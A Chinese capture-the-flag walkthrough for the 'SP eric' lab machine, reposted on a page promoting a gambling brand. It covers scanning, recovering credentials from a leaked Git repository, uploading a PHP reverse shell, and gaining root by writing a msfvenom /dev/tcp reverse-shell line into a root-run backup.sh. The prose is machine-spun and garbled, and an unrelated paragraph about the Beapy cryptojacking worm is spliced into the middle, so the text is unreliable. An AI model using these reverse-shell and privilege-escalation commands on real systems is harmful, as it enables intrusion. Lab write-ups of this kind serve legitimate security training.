SP eric靶机通关攻略 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

SP eric靶机通关攻略

申博_新闻事件 申博 122次浏览 已收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

渗入要领

· 收集扫描

· 接见HTTP效劳端口

· 运用dirb遍历目次

· 运用gitdumper来下载git文件

· 运用extractor来提取git文件

· 遍历登录凭据

· 上传PHP反向shell

· 猎取用户flag

· 应用PHP shell编纂文件

· 猎取root用户flag

Writeup

起首我们用nmap来对这个靶机举行端口扫描,经由过程扫描能够看到开放了80端口,以下图,我们还看到了扫出来了一个Git目次。

nmap -A 192.168.1.18

SP eric靶机通关攻略

既然开了80,我们就在浏览器中接见一下,看到以下信息,“blog under construction”(博客正在建设中),如图,看起来彷佛没什么可发掘的,我们再尝尝其他设施。

SP eric靶机通关攻略

那我们就来试一下目次遍历,这里我们运用dirb这款东西。扫出来了一个admin.php文件和一个upload目次。OK,我们将对它们进一步发掘。

dirb //192.168.1.18

SP eric靶机通关攻略

接见admin.php,是一个表单,有username和password这两个字段。看到表单,我们立时就会想到SQL注入。因而我们花了一点时候举行实验,无果,只好摒弃,只能再实验其他要领。

SP eric靶机通关攻略

Beapy Cryptojacking蠕虫正在突击中国企业

自2019年1月以来,赛门铁克研究团队首次发现了一种名为Beapy的Cryptojacking攻击行动。Cryptojacking是一种网络攻击方式,黑客通过在网站中加入恶意代码的方式将挖矿程序植入用户的电脑,非法调用用户的硬件资源进行“挖矿”。Beapy通过利用“永恒之蓝”漏洞和窃取硬编码凭证在网络上快速传播。此次攻击行动主要针对中国的企业,自今年3月初以来一直呈现增长势头。 Beapy (W32.Beapy)是一种基于文件的coinminer,它使用电子邮件作为初始感染载体。在201

如今,继承看nmap扫描效果,我们找到了一个Git库。在google上查找一番以后,我们找到了一个Git泄漏应用东西GitTools。我们把东西下载到桌面,以下图,接着我们进入到GitTools东西目次,ls一下,我们能够看到有3个东西:Dumper,Extractor和Finder。我们将运用这个东西来遍历我们发明的Git库。

git clone //github.com/internetwache/GitTools.git
cd GitTools/
ls

SP eric靶机通关攻略

起首,我们进入到Dumper目次,运用gitdumper东西。这会dump Git库中的一切文件。我们只须要指定一个下载目次便可,以下图:

SP eric靶机通关攻略

如今我们已胜利dump了Git库中的一切文件。接着该运用Extractor东西了。进入到Extractor目次中,运用Extractor东西,须要指定两个目次,一个是适才dump文件的目次,一个是提取文件的目次,以下图:

./extractor.sh ../Dumper/dest-dir ./dest-dir

SP eric靶机通关攻略

Extractor会依据Git中的commits来建立目次,以下图所示。Git中有3个commits,以是建立了3个目次。起首,我们进入个中一个目次“3db5628b550f5c9c9f6f663cd158374035a6eaa0”,发明内里有三个文件:admin.php,commitmeta.txt和index.php。我们用cat敕令来检察一下admin.php这个文件,发明了之前接见80端口时表单中的用户名和暗码,我们把这个凭据符号出来了,以下图:

SP eric靶机通关攻略

回到之前的表单页面,然后输入凭据,胜利上岸。登进来以后,我们发明了更多的表单,一个是“add new post”,另有一个是“add site to blogroll”,都是在建设中,如图:

SP eric靶机通关攻略

我们在表单中随意填入一些信息,然后在上传文件的地位挑选一个PHP反向shell。填完以后,我们点击add按钮来增加,如图:

SP eric靶机通关攻略

虽然文件已上传了,但我们要猎取到会话,照样要在靶机上接见一下这个文件。回到nmap扫描效果,我们找到一个“upload”目次。料想一下,适才上传的文件应该是传到了upload目次下,因而我们在浏览器中接见一下upload目次下的该文件,以下图:

SP eric靶机通关攻略

 

另一方面,我们须要翻开一个终端,建立一个nc监听器,监听的端口是PHP反向shell剧本里设置的端口。很快,我们就取得了靶机的shell。不外,取得的彷佛是一个Python shell,要取得靶机的体系shell,我们须要运用Python的一个语句,以下图。进入靶机的体系shell以后,我们就能够ls检察一下以后目次内容了,发明了eric目次,进入到该目次,找到了第一个flag。同时,在这个eric目次下,我们还发明了一个backup.sh文件,这个文件是以root身份运转的,而且具有一切的权限,以下图所示:

nc -lvp 1234
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /home
ls -al
cd eric
ls -al
cat flag.txt

SP eric靶机通关攻略

因而,我们就须要应用这个backup.sh文件来提权到root。我们建立了一个msfvenom脚正本打这个靶机。我们运用的是reverse_bash这个payload来建立剧本的,以下:

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.4 lport=4455 R

SP eric靶机通关攻略

复制剧本内容,然后切换到靶机的shell会话中,运用echo敕令,将内容写入到backup.sh中,以下:

echo "0<&171-;exec 171<>/dev/tcp/192.168.1.4/4455;sh <&171 >&171 2>&171" > backup.sh
cat backup.sh

SP eric靶机通关攻略

翻开一个新的终端,再建立别的一个nc监听器,监听的端口就是适才运用msfvenom建立剧本时的端口,4455。接着,我们实行一下这个backup.sh文件,立时就取得了一个root shell。我们照样须要运用Python语句来进入到体系的shell中。接着,我们切换到root目次下,看到了root flag,以下图:

nc -lvp 4455
id
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /root
ls
cat flag.txt

SP eric靶机通关攻略


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明SP eric靶机通关攻略
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址